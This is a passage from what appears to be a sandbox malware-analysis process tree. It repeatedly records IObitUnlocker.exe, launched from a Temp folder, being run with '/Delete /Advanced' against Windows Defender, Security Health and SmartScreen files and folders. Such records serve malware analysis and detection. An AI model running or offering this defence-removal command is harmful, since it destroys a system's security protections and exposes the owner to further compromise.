Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:12280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
